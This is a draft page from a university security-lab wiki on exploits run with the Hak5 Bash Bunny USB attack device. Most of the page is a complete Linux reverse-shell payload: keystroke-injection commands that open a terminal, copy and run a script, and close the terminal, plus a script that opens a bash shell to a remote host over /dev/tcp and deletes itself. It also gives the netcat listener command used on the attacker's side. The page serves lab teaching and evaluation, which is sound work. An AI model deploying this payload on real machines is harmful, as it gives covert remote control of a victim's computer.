Bash Bunny Exploits

From Embedded Lab Vienna for IoT & Security
Revision as of 12:49, 4 October 2021 by VHorvathova (talk | contribs)
Jump to navigation Jump to search

Summary

This is a DRAFT. The Hak5 Bash Bunny will be used for various exploits which will be explained, documented and evaluated in the following chapters.

Requirements

  • Operating system: Ubuntu 18.04 bionic amd64, Windows 10
  • Hardware: Hak5 Bash Bunny

In order to get a general idea about the Bash Bunny, please refer to Hak5 Bash Bunny or the official Hak5 Documentation and Git repository.

Exploits

Reverse shell on Linux

For this exploit, the Linux Reverse Shell payload is used, which is in the remote access category on Bash Bunny's Git Repository. 

bashbunny-payloads/payloads/library/remote_access/LinuxReverseShell

The payload is to be copied from the library and pasted to either switch1 or switch2 on the Bash Bunny, while it is plugged in in Arming mode.

The payload itself is a textfile payload.txt and comes with a script a.sh as well. It is well documented, which in the case of the Bash Bunny is quite a rarity and helps with the understanding of the program. The contents are the following:
payload.txt 

#!/bin/bash
#
# Title:         Linux Reverse Shell
# Author:        tuzzmaniandevil
# Version:       1.2
#
# Runs a script in the background that creates a reverse shell connection to the configured address and then removes itself.
#
# Magenta..................Setup
# Yellow single blink......Executing
# Green....................Finished

# Config options
RHOST=127.0.0.1
RPORT=4444

# Start Setup
LED SETUP

# Gets Switch Position
GET SWITCH_POSITION

# Set Attack Mode
ATTACKMODE HID STORAGE

# Get the switch position
GET SWITCH_POSITION

# Open a terminal
Q CTRL-ALT t

# Wait for terminal to open
sleep 1
LED STAGE1

# Copy bash script
Q STRING "cp \$(readlink -f /dev/disk/by-label/BashBunny | while read dev;do mount | grep \"\$dev\b\" | awk '{print \$3}';done)/payloads/"
Q STRING $SWITCH_POSITION
Q STRING "/a.sh ~/a.sh && chmod +x ~/a.sh && ~/a.sh $RHOST $RPORT"
Q ENTER

# Quit the terminal
LED CLEANUP
Q STRING exit
Q ENTER

LED FINISH

a.sh 

#!/bin/bash
A="$0"
H=$1
P=$2
/bin/bash -c /bin/bash -i > /dev/tcp/$H/$P 0<&1 2>&1 &
disown $!
rm -f "$A"

The setup is the following:

  • as an attacker, a Kali Linux VM is used
  • as the victim, since this is a Linux Reverse Shell, Ubuntu 20.04 is used to represent a regular PC client at a company or private computer

The way a reverse shell works:

Therefore, on the attacker a listener is set up with netcat with the following command: 

nc -lvp 4444
Flag Meaning
l listen for inbound connections
v verbose
p local port number


Password Grabber

References

Retrieved from "https://wiki.elvis.science/index.php?title=Bash_Bunny_Exploits&oldid=7842"